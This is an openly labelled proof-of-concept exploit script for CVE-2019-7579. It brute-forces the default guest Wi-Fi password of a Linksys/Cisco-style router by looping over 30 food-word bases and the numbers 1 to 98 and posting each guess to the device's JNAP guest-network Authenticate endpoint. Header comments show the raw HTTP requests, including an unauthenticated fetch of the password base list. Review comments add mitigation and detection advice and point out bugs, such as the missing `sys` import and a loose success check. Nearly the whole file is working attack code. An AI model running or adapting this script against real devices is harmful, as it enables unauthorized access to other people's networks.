import requests
import json

# Author: Aaron Weathersby (t0b0rx0r)
# email: t0b0rx0r@gmail.com
# Twitter: @t0b0rx0r
# github: https://github.com/t0b0rX0r/security
# blog: http://www.x0rsecurity.com
# CVE: CVE-2019-7579
# Intent of Program: To utilize a default password base along with a random 2 digit number to identify possible default guest wifi password.
# ----------------------------------------
# Where to get password base (only works if user did not manually change password)
# Note this request is unauthenticated
# GET /ui/1.0.99.187766/dynamic/js/setup.js.localized HTTP/1.1
# Host: 192.168.3.1:10080
# Accept-Encoding: gzip, deflate
# Accept: /
# Accept-Language: en
# User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
# Connection: close
# Referer: http://192.168.3.1:10080/ui/1.0.99.187766/dynamic/login-simple.html
# Cookie: is_cookies_enabled=null; visited-index=true
# ----------------------------------------
# ----------------------------------------
# POST request to attempt guest login
# POST /JNAP/ HTTP/1.1
# Host: 192.168.3.1:10080
# User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
# Accept: /
# Accept-Language: en-US,en;q=0.5
# Accept-Encoding: gzip, deflate
# Referer: http://192.168.3.1:10080/ui/dynamic/guest-login.html?mac_addr=20%3A16%3Ad8%3Af6%3A53%3A8f&url=http%3A%2F%2Fwww.cnn.com%2F&ip_addr=192.168.3.136
# Content-Type: application/json; charset=UTF-8
# X-JNAP-Action: http://cisco.com/jnap/guestnetwork/Authenticate
# Expires: Fri, 10 Oct 2013 14:19:41 GMT
# Cache-Control: no-cache
# X-Requested-With: XMLHttpRequest
# Content-Length: 80
# Cookie: visited-index=true; is_cookies_enabled=null
# Connection: close
# ----------------------------------------
#
# Review notes (what the code below does, and what it means for defenders):
# - The candidate space is small: 30 base words times the numbers 1 through 98,
#   i.e. 2,940 guesses, each sent as one POST to the guest-network
#   Authenticate action. A guest password left at its generated default is
#   therefore low-entropy.
# - The author's own caveat applies: this only matters while the guest
#   password has not been changed manually. Setting a long custom guest
#   password (or disabling the guest network) removes exposure to this
#   wordlist; also check the vendor advisory for CVE-2019-7579 for firmware
#   guidance.
# - Detection: a single client issuing many POST /JNAP/ requests with
#   X-JNAP-Action ending in guestnetwork/Authenticate in a short window.
#   The loop sends requests back to back with no delay, so the burst is easy
#   to spot. Whether the device throttles or locks out is not shown here.
# - NOTE(review): the script is written for Python 2 (`<>` operator) and
#   calls sys.exit() although `sys` is not imported in the visible source.

# Base words of the default guest password. The header above says this list
# can be read from setup.js.localized without authentication.
passwordBase = [
    "almond", "avocado", "basil", "banana", "blueberry", "cabbage",
    "carrot", "cherry", "cranberry", "cucumber", "garlic", "grape",
    "kiwi", "lettuce", "mango", "melon", "mushroom", "mustard",
    "nectarine", "olive", "onion", "pepper", "pineapple", "potato",
    "pumpkin", "radish", "raspberry", "strawberry", "tomato", "walnut"]

# Numeric suffixes; range(1,99) yields 1 through 98.
listofNumbers=range(1,99)

for x in passwordBase:
    for y in listofNumbers:
        # Despite its name, this dict holds the HTTP request headers (it is
        # passed as headers= below). X-JNAP-Action selects the guest-network
        # Authenticate action.
        payload={"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0","Content-Type": "application/json; charset=UTF-8","X-JNAP-Action": "http://cisco.com/jnap/guestnetwork/Authenticate","X-Requested-With": "XMLHttpRequest","Cookie": "visited-index=true; is_cookies_enabled=null"}
        # Request body: hard-coded client MAC and IP (presumably from the
        # author's test setup) plus the candidate password, word + number.
        jSON={"macAddress":"21:16:d8:f6:53:8f",'ipAddress':'192.168.3.136','password':x+str(y)}
        #print(payload)
        # Plain-HTTP endpoint on the router; the guest password candidate
        # travels unencrypted in the request body.
        url='http://192.168.3.1:10080/JNAP/'
        r = requests.post(url,headers=payload,data=json.dumps(jSON))
        #data = r.json()
        #print("Reponse: ")
        #print(r.text)
        print("Trying... "+x+str(y))
        # Success heuristic: anything other than "ErrorInvalidPassword" at
        # character offset 13 of the response body counts as a hit. find()
        # returns -1 when the marker is absent, so an unrelated error
        # response would also be reported as a found password.
        if r.text.find("ErrorInvalidPassword") <> 13:
            print ("Found Password!")
            #print(r.text)
            print("Password is "+x+str(y))
            # Stops at the first reported hit, with exit status 1.
            sys.exit(1)
# end of POC